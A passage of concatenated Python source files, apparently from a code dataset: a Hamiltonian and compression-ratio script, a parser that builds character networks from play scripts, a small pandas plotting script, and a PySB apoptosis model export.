H_pairwise_scaled = H_pairwise_scaled / num_cells
H_multi = H_self + H_app + H_pairwise_scaled
return H_multi, H_self, H_app, H_pairwise_scaled
def calc_graph_energy(multicell, step, norm=True):
"""
Graph energy is the multicell hamiltonian
H_multi = [Sum (H_internal)] - gamma * [Sum(interactions)] - fs * [app_field dot Sum(state)]
- Only valid for symmetric J, W, A matrices
- Field should be 1D arr of size num_cells * num_genes, already scaled by field strength kappa
- Returns total energy and the three main terms
H_quadratic_form, H_multi, H_self, H_app, H_pairwise_scaled
- Expect H_quadratic_form to equal H_multi when no_exo_field is used
"""
num_cells = multicell.num_cells
H_self = 0
H_pairwise = 0
H_app = 0
# TODO how to incorporate exosomes
H_quadratic_form = -0.5 * np.dot(np.dot(multicell.matrix_J_multicell,
multicell.graph_state_arr[:, step]),
multicell.graph_state_arr[:, step]) \
- np.dot(multicell.field_applied[:, step], multicell.graph_state_arr[:, step])
for a in range(num_cells):
cell_state = multicell.get_cell_state(a, step)
# compute self energies and applied field contribution separately
H_self += hamiltonian(cell_state, multicell.matrix_J, field=None, fs=0.0)
# compute applied field term on that cell
field_on_cell = multicell.get_field_on_cell(a, step)
H_app -= np.dot(cell_state.T, field_on_cell)
# compute interactions # TODO check validity
# note that a cells neighboursa are the ones which 'send' to it
# if A_ij = 1, then there is a connection from i to j
# to get all the senders to cell i, we need to look at col i
graph_neighbours_col = multicell.matrix_A[:, a]
graph_neighbours = [idx for idx, i in enumerate(graph_neighbours_col) if i == 1]
field_signal_exo, _ = general_exosome_field(multicell, a, step, neighbours=graph_neighbours)
field_signal_W = general_paracrine_field(
multicell, a, step, flag_01=False, neighbours=graph_neighbours)
field_signal_unscaled = field_signal_exo + field_signal_W
H_pairwise -= np.dot(field_signal_unscaled, cell_state)
# divide by two because double-counting neighbours
H_pairwise_scaled = H_pairwise * multicell.gamma / 2
if norm:
H_quadratic_form = H_quadratic_form / num_cells
H_self = H_self / num_cells
H_app = H_app / num_cells
H_pairwise_scaled = H_pairwise_scaled / num_cells
H_multi = H_self + H_app + H_pairwise_scaled
return H_quadratic_form, H_multi, H_self, H_app, H_pairwise_scaled
def get_state_of_lattice(lattice, simsetup, datatype='full'):
M1 = len(lattice)
M2 = len(lattice[0])
if datatype == 'full':
x = np.zeros((M1, M2, simsetup['N']), dtype=int)
for i in range(M1):
for j in range(M2):
cell = lattice[i][j]
x[i,j,:] = (1 + cell.get_current_state()) / 2.0 # note 01 rep
return x
def calc_compression_ratio(x, eta_0=None, datatype='full', elemtype=np.bool, method='manual'):
"""
TODO add an eta_min ref point as all zeros of np.int with shape x.shape
x - the data object (assume lies between -1 and 1)
eta_0 is meant to be a rough upper bound on eta(x)
- compute via 'maximally disordered' input x (random data)
Returns eta(x)/eta_0 ranging between 0 and 1 +- eps
"""
assert method in ['manual', 'package']
assert datatype in ['full', 'custom']
assert elemtype in [np.bool, np.int, np.float]
def foo(x_to_compress):
fname = 'tmp.npz'
np.savez_compressed(fname, a=x_to_compress)
fsize = os.path.getsize(fname)
os.remove(fname)
return fsize
if datatype == 'full':
if eta_0 is None:
x_random = np.random.randint(0, high=2, size=x.shape, dtype=np.int)
eta_0 = foo(x_random) # consider max over few realizations?
if x.dtype != elemtype:
print('NOTE: Recasting x as elemtype', elemtype, 'from', x.dtype)
x = x.astype(dtype=elemtype)
eta = foo(x)
else:
assert datatype == 'custom'
if eta_0 is None:
assert -1 <= np.min(x) <= np.max(x) <= 1
#x_random = np.random.rand(*(x.shape))*2 - 1 # TODO flag ref as float or bool
if elemtype==np.bool:
if x.dtype!=np.bool:
print('NOTE: Recasting x as np.float from', x.dtype)
x = x.astype(dtype=np.bool)
x_random = np.random.randint(0, high=2, size=x.shape, dtype=np.bool)
elif elemtype==np.int:
assert np.issubdtype(x.dtype, np.int)
nint = len(set(x))
x_random = np.random.randint(0, high=nint+1, size=x.shape, dtype=np.int)
else:
assert elemtype==np.float
if x.dtype!=np.float:
print('NOTE: Recasting x as np.float from', x.dtype)
x = x.astype(dtype=np.float)
x_random = np.random.rand(*(x.shape)) * 2 - 1
eta_0 = foo(x_random) # consider max over few realizations?
eta = foo(x)
return float(eta)/eta_0, eta, eta_0
def test_compression_ratio():
nn = 10000
print("test_compression_ratio for x: %dx1 array..." % nn)
x1 = np.ones(nn, dtype=np.int) #[1, 1, 1, 1]
x2 = np.zeros(nn, dtype=np.int) #[-1, -1, -1, -1]
x3 = np.random.randint(0, high=2, size=nn)
eta_ratio_1, eta_1, eta_0_1 = \
calc_compression_ratio(x1, eta_0=None, datatype='custom', method='manual', elemtype=np.bool)
eta_ratio_2, eta_2, eta_0_2 = \
calc_compression_ratio(x2, eta_0=None, datatype='custom', method='manual', elemtype=np.bool)
eta_ratio_3, eta_3, eta_0_3 = \
calc_compression_ratio(x3, eta_0=None, datatype='custom', method='manual', elemtype=np.bool)
print('x1', 'gives', eta_ratio_1, eta_1, eta_0_1)
print('x2', 'gives', eta_ratio_2, eta_2, eta_0_2)
print('x3', 'gives', eta_ratio_3, eta_3, eta_0_3)
xshape = (1000, 500)
print("test_compression_ratio for x: %d x %d array..." % (xshape[0], xshape[1]))
x1 = np.ones(xshape)
x2 = -np.ones(xshape)
x3 = np.zeros(xshape)
x4 = np.zeros(xshape)
x4[:,0] = 1
x5 = np.random.rand(*xshape)*2 - 1
print(x5.shape)
x6 = np.random.randint(-1, high=2, size=xshape)
x7 = np.random.randint(0, high=2, size=xshape) * 2 - 1
x_dict ={1: {'data': x1, 'label': 'all +1', 'dtype': np.bool},
2: {'data': x2, 'label': 'all -1', 'dtype': np.bool},
3: {'data': x3, 'label': 'all 0', 'dtype': np.bool},
4: {'data': x4, 'label': 'all 0 except all 1 first col', 'dtype': np.bool},
5: {'data': x5, 'label': 'rand floats -1 to 1', 'dtype': np.float},
6: {'data': x6, 'label': 'rand ints -1, 0, 1', 'dtype': np.float},
7: {'data': x7, 'label': 'rand ints -1, 1', 'dtype': np.float}}
for idx in range(1, len(list(x_dict.keys()))+1):
elem = x_dict[idx]['data']
elemtype = x_dict[idx]['dtype']
eta_ratio, eta, eta_0 = calc_compression_ratio(
elem, eta_0=None, datatype='custom', method='manual', elemtype=elemtype)
print(x_dict[idx]['label'], 'gives', eta_ratio, eta, eta_0)
return None
if __name__ == '__main__':
test_compression_ratio()
|
py | 1a4b84a4e1713c36e9be6eadd66ac72a8f37b8e4 | # Just ? and To Sb. are considered
# regular expression
import re,sys
def preprocessing(f,sf,logg):
excep = ['ALL','All','all','BOTH','Both','both','AND','And','and','BUT','But','but', ',']
stage = set()
nodes = []
temp_file = open('temp.xml','w+')
coun = 0 # to determine if no one is specified after exit
last_guy = ''
# parse characters as nodes
f.seek(0)
for line in f:
if '<a name=\"speech' in line or '<A NAME=speech' in line:
protagonist = line[line.index('<b>')+3:line.index('</b>')].strip()
if 'but' in protagonist:
protagonist = protagonist[:protagonist.index('but')]
protagonist = re.sub(r'and ','',protagonist).strip()
protagonist = re.sub(r',',' ',protagonist).strip()
if len(set(protagonist.split(' ')).intersection(set(excep)))==0:
protagonist = re.sub(r' ',r'_',protagonist).strip()
if protagonist not in nodes:
nodes.append(protagonist)
# space within character is substition replaced by underscore
line = line[:line.index('<b>')+3]+protagonist+line[line.index('</b>'):]
temp_file.write(line)
# parse stage
f.seek(0)
temp_file.seek(0)
for no,line in enumerate(temp_file):
if '<i>' in line and ('Enter' in line or 'enter' in line):# include Re-enter
# line ends with \n, which would not interrupt <i>...</i>
# safely to filter with if '</i>' in line:
words = line[line.index('<i>')+3:line.index('</i>')]
# substitute anything other than identifier, i.e. \W
words = re.sub('^0-9a-zA-Z_',' ',words).strip()
for w in words.split(' '):
if w in nodes and w not in stage:# A' wife, witches
stage.add(w)
logg.write(str(no+1)+' -Enter- : '+w+'\n')
if '<i>' in line and \
('Exit' in line or 'Exeunt' in line or 'exit' in line or 'exeunt' in line or 'Dies' in line or 'dies' in line):# Exeunt A and/, B; Exit all; Exeunt all witches
if 'Exit' in line:
e = 'Exit'
elif 'exit' in line:
e = 'exit'
elif 'Exeunt' in line:
e = 'Exeunt'
elif 'exeunt' in line:
e = 'exeunt'
elif 'Dies' in line:
e = 'Dies'
elif 'dies' in line:
e = 'dies'
# For examples like 'Exit all witches', 'Exeunt both murderers'
# TO DO
if line[line.index(e)+len(e)]==' ': # Not exit/exeunt alone
exit_people = line[line.index(e)+len(e):line.index('</i>')].strip()
exit_people = re.sub(r'[,.?!;]',' ',exit_people).strip()
exit_people = re.sub(r'and ',' ',exit_people).strip()
if 'but' in exit_people:
exit_people = exit_people[:exit_people.index('but')]
if 'except' in exit_people:
exit_people = exit_people[:exit_people.index('except')]
for n in exit_people.split(' '):
if n in stage:
stage.remove(n)
elif e=='Exeunt' or e=='exeunt': # exit all
stage.clear()
logg.write(str(no+1)+' -Exeunt: Clear Stage- : '+'\n')
elif (e=='Exit' or e=='exit' or e=='Dies' or e=='dies') and last_guy!='':
stage.remove(last_guy)
if 'SCENE' in line or 'Scene' in line:
last_guy = ''
stage.clear()
logg.write(str(no+1)+' -SCENE: Clear Stage- : '+'\n')
if '[Aside to' in line:
t = '[Aside to'
line = line[:line.index(t)+1]+'To'+line[line.index(t)+9:]
if '<a name=\"speech' in line or '<A NAME=speech' in line:# To check if someone is not explicitely narrated in enter line
protagonist = line[line.index('<b>')+3:line.index('</b>')].strip()
# Tackle 'ALL' and 'BOTH'
if 'ALL' in protagonist or 'All' in protagonist or 'BOTH' in protagonist or 'Both' in protagonist: # Both murderers, All witches
if 'ALL' in line:
a = 'ALL'
elif 'All' in line:
a = 'All'
elif 'BOTH' in line:
a = 'BOTH'
elif 'Both' in line:
a = 'Both'
if ' ' in protagonist: # group members like 'All witches'
protagonist = protagonist[len(a)+1:].strip()
new_p = ''
for s in stage:
if (s[0]==protagonist[0] or s[0].lower()==protagonist[0]) and s[1:-2]==protagonist[1:-2]:
new_p = new_p + ' ' + s
protagonist = new_p.strip()
else: # solo word like ALL, BOTH
protagonist = re.sub(a,' ',protagonist).strip()
protagonist = re.sub(r',',' ',protagonist).strip()
for s in stage:
protagonist = protagonist + ' ' + s
protagonist = protagonist.strip()
line = line[:line.index('<b>')+3]+protagonist+line[line.index('</b>'):]
elif ' ' not in protagonist:
last_guy = protagonist
if protagonist not in stage:
stage.add(protagonist)
elif ' ' in protagonist:
for p in protagonist.split(' '):
if protagonist not in stage:
stage.add(protagonist)
sf.write(line)
return nodes
def parse_edge(text, nodes, logg):
#excep = ['ALL','All','all','BOTH','Both','both','AND','And','and','BUT','But','but', ',']
edges = {}
ask = False # lines ends up with ? mark
last_guy = ''
last_no = 0
spoken_to = ''
temp = ''
add_weight = [] # last_guy not speaked to sb. in multi times
# all_weight = [] # more than one guy has speaked simultaneously
# all_no = 0
text.seek(0)
for no, line in enumerate(text):
if '</blockquote>' in line: # End of someone's lines
if len(add_weight)>0:
for char in add_weight:
temp = last_guy +','+char
edges[temp] = edges[temp] + no
logg.write(str(no+1)+' -TO- Conclude weight: '+temp+', '+str(edges[temp])+'\n')
# if len(all_weight)>0:
# for p in all_weight:
# for char in all_weight:
# if char!=p:
# # bidirection
# temp = p +','+char
# if temp not in edges.keys():
# edges[temp] = no - all_no
# else:
# edges[temp] = edges[temp] + no - all_no
# logg.write(str(no+1)+' -Simul- Conclude weight: '+temp+', '+str(edges[temp])+'\n')
#
# all_weight = []
# all_no = 0
elif 'SCENE' in line or 'Scene' in line:
last_guy = ''
last_no = 0
ask = False
spoken_to = ''
add_weight = []
logg.write(str(no+1)+' -SCENE: Clear Stage- : '+'\n')
elif ('<a name=\"' in line or '<A NAME=' in line) and line[line.index('=')+1].isdigit()==True:#speaking lines
#logg.write(str(no+1)+' - Speaking line: '+line)
if '[To ' in line: # [to Sb.]
spoken_to = line[line.index('[To')+len('[To'):line.index(']')].strip()
if 'but' in spoken_to:
spoken_to = spoken_to[:spoken_to.index('but')]
if 'except' in spoken_to:
spoken_to = spoken_to[:spoken_to.index('except')]
spoken_to = re.sub('and\s*','',spoken_to)
spoken_to = re.sub(',',' ',spoken_to)
for char in spoken_to.split(' '):
if char in nodes and char!=last_guy:
temp = last_guy +','+char
add_weight.append(char)
if temp not in edges.keys():
edges[temp] = -no
else:
edges[temp] = edges[temp] - no
logg.write(str(no+1)+' -Aside to- Start with key: '+temp+'\n')
spoken_to = ''
if ask==True:# turn off the above question
ask = False
#print 'Last simbol of lines is :' not -2
if '</a>' in line and line[line.index('</a>')-1]=='?'or '</A>' in line and line[line.index('</A>')-1]=='?':
ask = True
elif '<i>To ' in line:# To somebody
spoken_to = line[line.index('To')+3:line.index('</i>')]
if 'but' in spoken_to:
spoken_to = spoken_to[:spoken_to.index('but')]
if 'except' in spoken_to:
spoken_to = spoken_to[:spoken_to.index('except')]
spoken_to = re.sub('and\s*','',spoken_to)
spoken_to = re.sub(',',' ',spoken_to)
for char in spoken_to.split(' '):
if char in nodes and char!=last_guy:
temp = last_guy +','+char
add_weight.append(char)
if temp not in edges.keys():
edges[temp] = -no
else:
edges[temp] = edges[temp] - no
logg.write(str(no+1)+' -TO- Start with key: '+temp+'\n')
spoken_to = ''
elif '<a name=\"speech' in line or '<A NAME=speech' in line: #character line
protagonist = line[line.index('<b>')+3:line.index('</b>')]
if 'but' in protagonist:
protagonist = protagonist[:protagonist.index('but')]
if 'except' in protagonist:
protagonist = protagonist[:protagonist.index('except')]
protagonist = re.sub('and\s*','',protagonist)
protagonist = re.sub(',','',protagonist)
logg.write(str(no+1)+' - Character line: '+protagonist+'\n')
# Someone speak simutaneously could be seemed as silent contact before words out
# if ' ' in protagonist:
# logg.write(str(no+1)+' -Simul- Spotted!: '+protagonist+'\n')
# all_no = no
# for p in protagonist.split(' '):
# if p in nodes:
# all_weight.append(p)
# #if ask==True:
# all_weight.remove(last_guy)
if len(add_weight)>0: #Expell someone already counted in 'To sb.'
for char in add_weight:
if char in protagonist.split(' '):
protagonist = re.sub(char,'',protagonist)
protagonist = re.sub(r' ','',protagonist)
logg.write(str(no+1)+' - Exclude from TO: '+char+'\n')
add_weight = []
#l = set(protagonist).intersection(set(excep))
logg.write(str(no+1)+' - After washing: '+protagonist+'\n')
logg.write(str(no+1)+' - Before entering ASK: '+'\n')
logg.write(str(no+1)+' - ask = : '+str(ask)+'\n')
if ask==True and len(protagonist)>0: #last_guy has asked
ask = False
if protagonist in nodes and protagonist!=last_guy:
temp = last_guy +','+protagonist
if temp not in edges.keys():
edges[temp] = no - last_no
else:
edges[temp] = edges[temp] + no - last_no
logg.write(str(no+1)+' -?1- Conclude ASK: '+temp+', '+str(edges[temp])+'\n')
else:# Maybe confused by space in character
for char in protagonist.split(' '):
if char!='' and char in nodes and char!=last_guy:
temp = last_guy +','+char
if temp not in edges.keys():
edges[temp] = no - last_no
else:
edges[temp] = edges[temp] + no - last_no
logg.write(str(no+1)+' -?2- Conclude ASK: '+temp+', '+str(edges[temp])+'\n')
if line[line.index('<b>')+3:line.index('</b>')] in nodes:
last_guy = line[line.index('<b>')+3:line.index('</b>')]
last_no = no
logg.write(str(no+1)+' - Update last_guy: '+last_guy+'\n')
return edges
def reconstruct(f,logg,chars,directed):
isolated = []
match = 0
last_guy = ''
last_no = 0
temp = ''
complement = {}
flag = 0
no = 0
line = ''
#to find nodes that are not connected
for n in chars:
match = 0
for k in directed.keys():
for word in re.split(r',',k):
if n == word:
match = 1
if match==0:
isolated.append(n)
# Isolated nodes are:
print 'Isolated node: '
for w in isolated:
print w+',',
print '\n'
logg.write('---------------Here comes compensated eges!-----------------\n')
f.seek(0)# This is too important, or the following script would output nothing besides errors.
#To complement
for no,line in enumerate(f):
if 'SCENE' in line or 'Scene' in line:
last_guy = ''
last_no = 0
logg.write(str(no+1)+' -SCENE: Clear Stage- : '+'\n')
elif '<a name=\"speech' in line or '<A NAME=speech' in line: #character line
protagonist = line[line.index('<b>')+3:line.index('</b>')]
if 'but' in protagonist:
protagonist = protagonist[:protagonist.index('but')]
if 'except' in protagonist:
protagonist = protagonist[:protagonist.index('except')]
protagonist = re.sub('and\s*','',protagonist)
protagonist = re.sub(',','',protagonist)
if protagonist!='' and last_guy!='' and protagonist in chars and protagonist!=last_guy and (protagonist in isolated or last_guy in isolated):
temp = last_guy +','+protagonist
if temp not in complement.keys():
complement[temp] = no - last_no
else:
complement[temp] = complement[temp] + no - last_no
logg.write(str(no+1)+' -C1- Compensate one: '+temp+', '+str(complement[temp])+'\n')
else:
for char in protagonist.split(' '):
if char!='' and last_guy!='' and char!=last_guy and (char in isolated or last_guy in isolated):
temp = last_guy +','+char
if temp not in complement.keys():
complement[temp] = no - last_no
else:
complement[temp] = complement[temp] + no - last_no
logg.write(str(no+1)+' -C2- Compensate one: '+temp+', '+str(complement[temp])+'\n')
if protagonist in chars:
last_guy = protagonist
last_no = no
logg.write(str(no+1)+' - Update last_guy: '+last_guy+'\n')
print 'Done with reconstruction.'
return complement
def main(argv):
#temp = ''
tran = 0.0
aggregate = 0.0
mean = 0.0
#factor = .5
#match = False
less = []
ldet = 0.0
alpha = 2
tu =0.95
strong_edge = 0
f = open(argv[1],'r')
log_file = open(argv[1][:argv[1].index('.html')]+'_log.txt','w')
standard_file = open(argv[1][:argv[1].index('.html')]+'_standard.xml','w+')
node_file = open(argv[1][:argv[1].index('.html')]+'_nodes.txt','w')
edge_file = open(argv[1][:argv[1].index('.html')]+'_edges.txt','w')
# compensated_file=open(argv[1][:argv[1].index('.html')]+'_compensated_edges.txt','w')
node_file.write('Id,Label\n')
nodes = preprocessing(f,standard_file, log_file)
#print nodes
edge_file.write('Source,Target,Type,Weight\n')
edges = parse_edge(standard_file, nodes, log_file)
# calculate the mean value of weights
for k,v in edges.iteritems():
aggregate = aggregate + v
mean = aggregate/len(edges)
print 'Mean value is '+str(mean)
# count edges if it less than mean
print 'less than mean: '
for k,v in edges.iteritems():
if v<=mean:
less.append(v)
print v
print 'count of edges: '+str(len(edges))
print 'count of less: '+str(len(less))
# count accumulative (mean-v)
for v in less:
ldet+=mean-v
ldet/=len(less)
tran = mean-alpha*ldet
print 'ldet: '+str(ldet)
print 'tran: '+str(tran)
nodes = []
log_file.write('-----Here comes new nodes------\n')
# eliminate nodes without links
for key in edges.keys():
for k in re.split(r',',key):
if k not in nodes:
nodes.append(k)
log_file.write(k+'\n')
# write nodes into file
for k,v in enumerate(nodes):
node_file.write(str(k+1)+','+v+'\n')
for k,v in edges.iteritems():
##print k+','+str(v)
for n in re.split(r',',k):
edge_file.write(str(nodes.index(n)+1))
edge_file.write(',')
edge_file.write('Directed')
edge_file.write(',')
# revise into fuzzy number
#print 'v is :'+str(v)
if v>mean or (v<=mean and v>=tran and (v-tran)/(alpha*ldet)>tu):
edge_file.write(str(20))
#print 'v-t/a*l > tu:'+str((v-tran)/alpha*ldet)
print 'Strong!'
strong_edge+=1
else:
edge_file.write(str(10))
print 'Weak!'
edge_file.write('\n')
print 'strong_edge count is '+str(strong_edge)
print 'weak_edge count is '+str(len(edges)-strong_edge)
log_file.write('---------------Here comes regular edges!--------------------\n')
for k,v in edges.iteritems():
log_file.write(k+','+str(v)+'\n')
# print '---------------Here comes compensated edges!--------------------'
# compensated_file.write('Source,Target,Type,Weight\n')
# compensated = reconstruct(standard_file,log_file,nodes,edges)
# for k,v in compensated.iteritems():
# print k+','+str(v)
# for n in re.split(r',',k):
# compensated_file.write(str(nodes.index(n)+1))
# compensated_file.write(',')
# compensated_file.write('Directed')
# compensated_file.write(',')
# compensated_file.write(str(int(v*factor)))
# compensated_file.write('\n')
# log_file.write('---------------Here comes compensated edges!--------------------\n')
# for k,v in compensated.iteritems():
# log_file.write(k+','+str(v)+'\n')
if __name__ == '__main__':
main(sys.argv)
|
py | 1a4b84e1a6965fe557a278121f7b31201667bf93 | import pandas as pd
data = [[45939, 21574, 2876, 1815, 1646, 89, 555],
[60423, 29990, 4708, 2568, 2366, 1411, 733],
[64721, 32510, 5230, 2695, 2526, 1546, 773],
[68484, 35218, 6662, 2845, 2691, 1663, 836],
[71799, 37598, 6856, 3000, 2868, 1769, 911],
[76036, 40341, 8220, 3145, 3054, 1905, 1008],
[79831, 43173, 9053, 3338, 3224, 2005, 1076]]
data = pd.DataFrame(
data = data,
index = [1951, 1956, 1957, 1958, 1959, 1960, 1961],
columns = ['N.Amer', 'Europe', 'Asia', 'S.Amer', 'Oceania', 'Africa', 'Mid.Amer']
)
data
for col in data.columns:
fig = data.plot.bar(y=col).get_figure().savefig('figs/' + col + '.png')
from jinja2 import Template
str = open('templates/index.html', 'r').read()
template = Template(str)
str = template.render(regions=data.columns.tolist())
open('index.html', 'w').write(str); |
py | 1a4b86f34e281a1a16871c5d3c0c2b78e6005f7c | # exported from PySB model 'model'
from pysb import Model, Monomer, Parameter, Expression, Compartment, Rule, Observable, Initial, MatchOnce, Annotation, ANY, WILD
Model()
Monomer('Ligand', ['Receptor'])
Monomer('ParpU', ['C3A'])
Monomer('C8A', ['BidU'])
Monomer('BaxM', ['BidM', 'BaxA'])
Monomer('Apop', ['C3pro', 'Xiap'])
Monomer('Fadd', ['Receptor', 'C8pro'])
Monomer('ParpC')
Monomer('Xiap', ['Apop', 'C3A'])
Monomer('C9')
Monomer('C3ub')
Monomer('C8pro', ['Fadd'])
Monomer('C3pro', ['Apop'])
Monomer('CytoCM', ['BaxA'])
Monomer('CytoCC')
Monomer('BaxA', ['BaxM', 'BaxA_1', 'BaxA_2', 'CytoCM'])
Monomer('ApafI')
Monomer('BidU', ['C8A'])
Monomer('BidT')
Monomer('C3A', ['Xiap', 'ParpU'])
Monomer('ApafA')
Monomer('BidM', ['BaxM'])
Monomer('Receptor', ['Ligand', 'Fadd'])
Parameter('bind_0_Ligand_binder_Receptor_binder_target_2kf', 1.0)
Parameter('bind_0_Ligand_binder_Receptor_binder_target_1kr', 1.0)
Parameter('bind_0_Receptor_binder_Fadd_binder_target_2kf', 1.0)
Parameter('bind_0_Receptor_binder_Fadd_binder_target_1kr', 1.0)
Parameter('substrate_binding_0_Fadd_catalyzer_C8pro_substrate_2kf', 1.0)
Parameter('substrate_binding_0_Fadd_catalyzer_C8pro_substrate_1kr', 1.0)
Parameter('catalytic_step_0_Fadd_catalyzer_C8pro_substrate_C8A_product_1kc', 1.0)
Parameter('catalysis_0_C8A_catalyzer_BidU_substrate_BidT_product_2kf', 1.0)
Parameter('catalysis_0_C8A_catalyzer_BidU_substrate_BidT_product_1kr', 1.0)
Parameter('catalysis_1_C8A_catalyzer_BidU_substrate_BidT_product_1kc', 1.0)
Parameter('conversion_0_CytoCC_subunit_d_ApafI_subunit_c_ApafA_complex_2kf', 1.0)
Parameter('conversion_0_CytoCC_subunit_d_ApafI_subunit_c_ApafA_complex_1kr', 1.0)
Parameter('conversion_0_C9_subunit_d_ApafA_subunit_c_Apop_complex_2kf', 1.0)
Parameter('conversion_0_C9_subunit_d_ApafA_subunit_c_Apop_complex_1kr', 1.0)
Parameter('catalysis_0_Apop_catalyzer_C3pro_substrate_C3A_product_2kf', 1.0)
Parameter('catalysis_0_Apop_catalyzer_C3pro_substrate_C3A_product_1kr', 1.0)
Parameter('catalysis_1_Apop_catalyzer_C3pro_substrate_C3A_product_1kc', 1.0)
Parameter('inhibition_0_Xiap_inhibitor_Apop_inh_target_2kf', 1.0)
Parameter('inhibition_0_Xiap_inhibitor_Apop_inh_target_1kr', 1.0)
Parameter('catalysis_0_Xiap_catalyzer_C3A_substrate_C3ub_product_2kf', 1.0)
Parameter('catalysis_0_Xiap_catalyzer_C3A_substrate_C3ub_product_1kr', 1.0)
Parameter('catalysis_1_Xiap_catalyzer_C3A_substrate_C3ub_product_1kc', 1.0)
Parameter('catalysis_0_C3A_catalyzer_ParpU_substrate_ParpC_product_2kf', 1.0)
Parameter('catalysis_0_C3A_catalyzer_ParpU_substrate_ParpC_product_1kr', 1.0)
Parameter('catalysis_1_C3A_catalyzer_ParpU_substrate_ParpC_product_1kc', 1.0)
Parameter('equilibration_0_BidT_equil_a_BidM_equil_b_1kf', 1.0)
Parameter('equilibration_0_BidT_equil_a_BidM_equil_b_1kr', 1.0)
Parameter('catalysis_0_BidM_catalyzer_BaxM_substrate_BaxA_product_2kf', 1.0)
Parameter('catalysis_0_BidM_catalyzer_BaxM_substrate_BaxA_product_1kr', 1.0)
Parameter('catalysis_1_BidM_catalyzer_BaxM_substrate_BaxA_product_1kc', 1.0)
Parameter('self_catalyze_0_BaxA_self_catalyzer_BaxM_self_substrate_2kf', 1.0)
Parameter('self_catalyze_0_BaxA_self_catalyzer_BaxM_self_substrate_1kr', 1.0)
Parameter('self_catalyze_1_BaxA_self_catalyzer_BaxM_self_substrate_1kc', 1.0)
Parameter('pore_formation_0_BaxA_pore_2kf', 1.0)
Parameter('pore_formation_0_BaxA_pore_1kr', 1.0)
Parameter('pore_formation_1_BaxA_pore_2kf', 1.0)
Parameter('pore_formation_1_BaxA_pore_1kr', 1.0)
Parameter('pore_formation_2_BaxA_pore_2kf', 1.0)
Parameter('pore_formation_2_BaxA_pore_1kr', 1.0)
Parameter('transport_0_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C_2kf', 1.0)
Parameter('transport_0_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C_1kr', 1.0)
Parameter('transport_1_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C_1kc', 1.0)
Parameter('Ligand_0', 1000.0)
Parameter('ParpU_0', 1000000.0)
Parameter('C8A_0', 0.0)
Parameter('BaxM_0', 40000.0)
Parameter('Apop_0', 0.0)
Parameter('Fadd_0', 130000.0)
Parameter('ParpC_0', 0.0)
Parameter('Xiap_0', 92250.0)
Parameter('C9_0', 100000.0)
Parameter('C3ub_0', 0.0)
Parameter('C8pro_0', 130000.0)
Parameter('C3pro_0', 21000.0)
Parameter('CytoCM_0', 500000.0)
Parameter('CytoCC_0', 0.0)
Parameter('BaxA_0', 0.0)
Parameter('ApafI_0', 100000.0)
Parameter('BidU_0', 171000.0)
Parameter('BidT_0', 0.0)
Parameter('C3A_0', 0.0)
Parameter('ApafA_0', 0.0)
Parameter('BidM_0', 0.0)
Parameter('Receptor_0', 100.0)
Observable('Ligand_obs', Ligand())
Observable('ParpU_obs', ParpU())
Observable('C8A_obs', C8A())
Observable('BaxM_obs', BaxM())
Observable('Apop_obs', Apop())
Observable('Fadd_obs', Fadd())
Observable('ParpC_obs', ParpC())
Observable('Xiap_obs', Xiap())
Observable('C9_obs', C9())
Observable('C3ub_obs', C3ub())
Observable('C8pro_obs', C8pro())
Observable('C3pro_obs', C3pro())
Observable('CytoCM_obs', CytoCM())
Observable('CytoCC_obs', CytoCC())
Observable('BaxA_obs', BaxA())
Observable('ApafI_obs', ApafI())
Observable('BidU_obs', BidU())
Observable('BidT_obs', BidT())
Observable('C3A_obs', C3A())
Observable('ApafA_obs', ApafA())
Observable('BidM_obs', BidM())
Observable('Receptor_obs', Receptor())
Rule('bind_0_Ligand_binder_Receptor_binder_target', Ligand(Receptor=None) + Receptor(Ligand=None, Fadd=None) | Ligand(Receptor=1) % Receptor(Ligand=1, Fadd=None), bind_0_Ligand_binder_Receptor_binder_target_2kf, bind_0_Ligand_binder_Receptor_binder_target_1kr)
Rule('bind_0_Receptor_binder_Fadd_binder_target', Receptor(Ligand=ANY, Fadd=None) + Fadd(Receptor=None, C8pro=None) | Receptor(Ligand=ANY, Fadd=1) % Fadd(Receptor=1, C8pro=None), bind_0_Receptor_binder_Fadd_binder_target_2kf, bind_0_Receptor_binder_Fadd_binder_target_1kr)
Rule('substrate_binding_0_Fadd_catalyzer_C8pro_substrate', Fadd(Receptor=ANY, C8pro=None) + C8pro(Fadd=None) | Fadd(Receptor=ANY, C8pro=1) % C8pro(Fadd=1), substrate_binding_0_Fadd_catalyzer_C8pro_substrate_2kf, substrate_binding_0_Fadd_catalyzer_C8pro_substrate_1kr)
Rule('catalytic_step_0_Fadd_catalyzer_C8pro_substrate_C8A_product', Fadd(Receptor=ANY, C8pro=1) % C8pro(Fadd=1) >> Fadd(Receptor=ANY, C8pro=None) + C8A(BidU=None), catalytic_step_0_Fadd_catalyzer_C8pro_substrate_C8A_product_1kc)
Rule('catalysis_0_C8A_catalyzer_BidU_substrate_BidT_product', C8A(BidU=None) + BidU(C8A=None) | C8A(BidU=1) % BidU(C8A=1), catalysis_0_C8A_catalyzer_BidU_substrate_BidT_product_2kf, catalysis_0_C8A_catalyzer_BidU_substrate_BidT_product_1kr)
Rule('catalysis_1_C8A_catalyzer_BidU_substrate_BidT_product', C8A(BidU=1) % BidU(C8A=1) >> C8A(BidU=None) + BidT(), catalysis_1_C8A_catalyzer_BidU_substrate_BidT_product_1kc)
Rule('conversion_0_CytoCC_subunit_d_ApafI_subunit_c_ApafA_complex', ApafI() + CytoCC() | ApafA(), conversion_0_CytoCC_subunit_d_ApafI_subunit_c_ApafA_complex_2kf, conversion_0_CytoCC_subunit_d_ApafI_subunit_c_ApafA_complex_1kr)
Rule('conversion_0_C9_subunit_d_ApafA_subunit_c_Apop_complex', ApafA() + C9() | Apop(C3pro=None, Xiap=None), conversion_0_C9_subunit_d_ApafA_subunit_c_Apop_complex_2kf, conversion_0_C9_subunit_d_ApafA_subunit_c_Apop_complex_1kr)
Rule('catalysis_0_Apop_catalyzer_C3pro_substrate_C3A_product', Apop(C3pro=None, Xiap=None) + C3pro(Apop=None) | Apop(C3pro=1, Xiap=None) % C3pro(Apop=1), catalysis_0_Apop_catalyzer_C3pro_substrate_C3A_product_2kf, catalysis_0_Apop_catalyzer_C3pro_substrate_C3A_product_1kr)
